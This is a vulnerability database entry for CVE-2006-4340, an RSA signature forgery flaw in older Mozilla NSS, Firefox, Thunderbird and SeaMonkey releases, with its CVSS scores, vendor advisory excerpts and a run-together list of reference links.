4
CVSSv2

CVE-2006-4340

Published: 15/09/2006 Updated: 07/11/2023
CVSS v2 Base Score: 4 | Impact Score: 4.9 | Exploitability Score: 4.9
VMScore: 356
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:N

Vulnerability Summary

Mozilla Network Security Service (NSS) library prior to 3.11.3, as used in Mozilla Firefox prior to 1.5.0.7, Thunderbird prior to 1.5.0.7, and SeaMonkey prior to 1.0.5, when using an RSA key with exponent 3, does not properly handle extra data in a signature, which allows remote malicious users to forge signatures for SSL/TLS and email certificates, a similar vulnerability to CVE-2006-4339. NOTE: on 20061107, Mozilla released an advisory stating that these versions were not completely patched by MFSA2006-60. The newer fixes for 1.5.0.7 are covered by CVE-2006-5462.

Vulnerable Product Search on Vulmon Subscribe to Product

mozilla seamonkey

mozilla network security services

mozilla firefox

mozilla thunderbird

Vendor Advisories

Several security related problems have been discovered in Mozilla and derived products such as Mozilla Firefox The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-2788 Fernando Ribeiro discovered that a vulnerability in the getRawDER function allows remote attackers to cause a denial of serv ...
Several security related problems have been discovered in Mozilla and derived products such as Mozilla Thunderbird The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-2788 Fernando Ribeiro discovered that a vulnerability in the getRawDER function allows remote attackers to cause a denial of ...
Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page containing JavaScript (CVE-2006-4253, CVE-2006-4565, CVE-2006-4566, CVE-2006-4568, CVE-2006-4569 CVE-2006-4571) ...
Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious URL (CVE-2006-2788, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3809, CVE-2006-3811, CVE-2006-4565, CVE-2006-4568, CVE-2006-4571) ...
This update upgrades Thunderbird from 108 to 1507 This step was necessary since the 10x series is not supported by upstream any more ...
Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious email containing JavaScript Please note that JavaScript is disabled by default for emails, and it is not recommended to enable it (CVE-2006-4253, CVE-2006-4565, CVE-2006-4566, CVE-2006-4571) ...
Mozilla Foundation Security Advisory 2006-60 RSA Signature Forgery Announced September 14, 2006 Reporter Philip Mackenzie, Marius Schilder Impact Critical Products Firefox, NSS, SeaMonkey, Thunderbird Fixed in ...

References

CWE-20http://www.imc.org/ietf-openpgp/mail-archive/msg14307.htmlhttp://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/http://www.redhat.com/support/errata/RHSA-2006-0676.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0677.htmlhttp://secunia.com/advisories/21906http://secunia.com/advisories/21949http://www.redhat.com/support/errata/RHSA-2006-0675.htmlhttp://securitytracker.com/id?1016858http://securitytracker.com/id?1016859http://securitytracker.com/id?1016860http://secunia.com/advisories/21903http://secunia.com/advisories/21915http://secunia.com/advisories/21916http://secunia.com/advisories/21939http://secunia.com/advisories/21940http://secunia.com/advisories/21950ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.aschttp://www.ubuntu.com/usn/usn-350-1http://secunia.com/advisories/22036http://secunia.com/advisories/22001http://security.gentoo.org/glsa/glsa-200609-19.xmlhttp://www.novell.com/linux/security/advisories/2006_54_mozilla.htmlhttp://www.novell.com/linux/security/advisories/2006_55_ssl.htmlhttp://www.ubuntu.com/usn/usn-351-1http://www.ubuntu.com/usn/usn-352-1http://www.ubuntu.com/usn/usn-354-1http://secunia.com/advisories/22025http://secunia.com/advisories/22055http://secunia.com/advisories/22074http://secunia.com/advisories/22088http://www.us.debian.org/security/2006/dsa-1191http://security.gentoo.org/glsa/glsa-200610-01.xmlhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-102648-1http://secunia.com/advisories/22210http://secunia.com/advisories/22226http://secunia.com/advisories/22247http://secunia.com/advisories/22274http://support.avaya.com/elmodocs2/security/ASA-2006-224.htmhttp://www.debian.org/security/2006/dsa-1192http://www.gentoo.org/security/en/glsa/glsa-200610-06.xmlhttp://www.ubuntu.com/usn/usn-361-1http://secunia.com/advisories/22299http://secunia.com/advisories/22342http://secunia.com/advisories/22422http://secunia.com/advisories/22446http://www.us-cert.gov/cas/techalerts/TA06-312A.htmlhttp://www.debian.org/security/2006/dsa-1210http://secunia.com/advisories/22849http://secunia.com/advisories/22056http://secunia.com/advisories/22195http://support.avaya.com/elmodocs2/security/ASA-2006-250.htmhttp://secunia.com/advisories/22992https://issues.rpath.com/browse/RPL-640http://sunsolve.sun.com/search/document.do?assetkey=1-26-102781-1http://secunia.com/advisories/23883http://secunia.com/advisories/22044http://secunia.com/advisories/24711http://www.mandriva.com/security/advisories?name=MDKSA-2006:168http://www.mandriva.com/security/advisories?name=MDKSA-2006:169http://secunia.com/advisories/22066http://www.vupen.com/english/advisories/2006/3617http://www.vupen.com/english/advisories/2007/0293http://www.vupen.com/english/advisories/2006/3748http://www.vupen.com/english/advisories/2007/1198http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00771742http://www.vupen.com/english/advisories/2008/0083http://www.vupen.com/english/advisories/2006/3899http://www.vupen.com/english/advisories/2006/3622http://www.mozilla.org/security/announce/2006/mfsa2006-60.htmlhttp://www.mozilla.org/security/announce/2006/mfsa2006-66.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/30098https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11007http://www.securityfocus.com/archive/1/446140/100/0/threadedhttps://nvd.nist.govhttps://www.debian.org/security/./dsa-1210https://usn.ubuntu.com/351-1/